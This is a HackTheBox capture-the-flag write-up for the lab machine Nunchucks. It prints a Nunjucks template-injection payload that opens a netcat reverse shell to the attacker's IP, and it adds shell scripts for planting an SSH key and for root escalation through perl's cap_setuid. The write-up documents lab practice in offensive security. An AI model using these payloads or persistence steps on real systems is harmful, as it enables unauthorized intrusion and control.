Nunchucks
This is my write-up for the box Nunchucks on HackTheBox: https://app.hackthebox.com/machines/Nunchucks.
nmap scan: nmap -T4 -A -Pn 10.10.11.122 -oN nunchucks.nmap
I had a hard time connecting to the website. I then updated my /etc/hosts file and it worked!
I then ran a git clone of the SecLists GitHub repository. This repo has a lot of different wordlists which come in handy for directory/password brute-forcing. I did get stuck at this point, so I then looked at the HackTheBox walk-through from the site. I learned about the gobuster vhost mode, which checks for subdomains (virtual hosts) on the system:
gobuster vhost -u https://nunchucks.htb/ -w directory-list-2.3-medium.txt -k
This led me to discover store.nunchucks.htb. In order to visit the site, I had to add that name to my /etc/hosts file as well. I manually edited the file using nano, but the walk-through had a much easier solution for this (both names can go on one line):
echo "10.10.11.122 nunchucks.htb store.nunchucks.htb" | sudo tee -a /etc/hosts
We end up on this page:
I then ran feroxbuster on the website to see if there were directories that I can access:
I didn't get much help from this. The walk-through mentioned that there is a template injection vulnerability on this site. I tested out the example they gave:
The walk-through mentioned BurpSuite's Repeater function. I then used it to test what I could inject, in order to find out which template engine runs on the backend:
Using the following image from https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#detect, I narrowed the backend down to either Jinja2 or Twig. (Nunjucks evaluates the {{7*7}} and {{7*'7'}} probes exactly like Twig, so the decision tree cannot tell the two apart; the response headers settle it.)
After trying to get information from the system, I went back to the write-up and found out that the server is using Node.js Express. This is shown in the response in Burp Suite:
The walk-through mentions how they found the website http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine by searching on Google. I searched on Google as well, but this website did not appear in my search results. After this, the walk-through mentions running the following template injection (I modified it for my usage). Because the request body is JSON, the double quotes inside the expression have to be escaped with backslashes or the server rejects the body before it ever reaches the template engine:
{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f')\")()}}@test.com"}
I then got a reverse netcat connection:
I then was able to read the user.txt file in david's home directory:
I then ran script /dev/null bash on the recommendation of the walk-through. This gave me a proper shell prompt (with the username and hostname). I then ran getcap -r / to list binaries that carry file capabilities, again on the recommendation of the write-up:
The walk-through recommended using the perl page on GTFOBins. It seemed that I was root, but I was unable to read the root.txt file:
I was unable to get nano (text editor) to work as I wanted it to. I then added my own key to the authorized_keys file so that I could get back into the machine. In order to do this I did the following (recommended by the write-up):
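An added example of that persistence step (not the write-up's own commands): it installs a public key into the compromised user's authorized_keys with the permissions sshd insists on, and does not duplicate the key when run a second time. The key file name and the home directory are assumptions.

```shell
#!/bin/sh
# Added example, not from the original write-up. Installs an SSH public key
# for the compromised user so the box can be re-entered over SSH instead of
# re-running the SSTI payload. File names and paths are assumptions.
set -eu

# On the attacking machine (not run here):
#   ssh-keygen -t ed25519 -f htb_nunchucks -N ''
# then paste the one-line contents of htb_nunchucks.pub into the reverse
# shell as the first argument of install_authorized_key.

# install_authorized_key PUBKEY_LINE [HOME_DIR]
# With StrictModes (the default) sshd ignores the file unless ~/.ssh is 0700
# and authorized_keys is 0600, so the permissions are set explicitly each run.
install_authorized_key() {
  key=$1
  home=${2:-$HOME}
  sshdir=$home/.ssh
  auth=$sshdir/authorized_keys
  mkdir -p "$sshdir"
  chmod 700 "$sshdir"
  touch "$auth"
  chmod 600 "$auth"
  # Append only if this exact line is not already present (fixed-string,
  # whole-line match), so repeated runs leave a single entry.
  if ! grep -qxF "$key" "$auth"; then
    printf '%s\n' "$key" >> "$auth"
  fi
}

# How many times a key line appears in the file (used to verify idempotence).
count_key() {
  grep -cxF "$1" "${2:-$HOME}/.ssh/authorized_keys"
}

# Afterwards, from the attacking machine:
#   ssh -i htb_nunchucks david@nunchucks.htb
```

If the login still fails, check the target's sshd_config for PubkeyAuthentication and AuthorizedKeysFile before suspecting the key.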
I was lost at this point, since the GTFOBins commands were not getting me solid results. The write-up mentioned turning the perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' one-liner into a script. This was the solution from the write-up:
Once you run chmod +x on the file and execute it, you get root access. You then also have access to root.txt.
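The script form of that GTFOBins one-liner, as an added example rather than the write-up's own file: a helper confirms that perl carries cap_setuid in its file capabilities (what getcap -r / reported above), writes the script with error checks, and marks it executable. The page does not say why the -e form on this box ends up as uid 0 yet still cannot read root.txt while the script form succeeds; if you hit the same behaviour elsewhere, a mandatory access control profile on the interpreter is one common cause, and /proc/self/attr/current from inside the shell shows whether one is applied. The path /usr/bin/perl is an assumption taken from the usual getcap output.

```shell
#!/bin/sh
# Added example, not from the original write-up. Turns the GTFOBins perl
# one-liner into a script file, which is the form the write-up reports working.
set -eu

PERL=/usr/bin/perl   # path as reported by getcap -r /; assumed here

# Returns 0 if the interpreter carries cap_setuid in its file capabilities.
# Without that, setuid(0) in the script fails and there is nothing to exploit.
perl_has_cap_setuid() {
  getcap "${1:-$PERL}" 2>/dev/null | grep -q 'cap_setuid'
}

# Writes the script. setuid(0) and exec are checked so a blocked call is
# reported instead of silently dropping into an unprivileged sh.
write_setuid_script() {
  out=$1
  cat > "$out" <<'EOF'
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0) or die "setuid(0) failed: $!\n";
exec "/bin/sh" or die "exec /bin/sh failed: $!\n";
EOF
  chmod +x "$out"
}

# Usage on the target, from the david shell:
#   perl_has_cap_setuid && write_setuid_script /tmp/root.pl && /tmp/root.pl
# If you get uid 0 but file reads still fail, inspect the confinement of the
# new shell with: cat /proc/self/attr/current
```

The die calls matter: the bare one-liner on GTFOBins execs /bin/sh regardless of whether setuid(0) worked, which is exactly the situation where you appear to be root but cannot read anything you expect to.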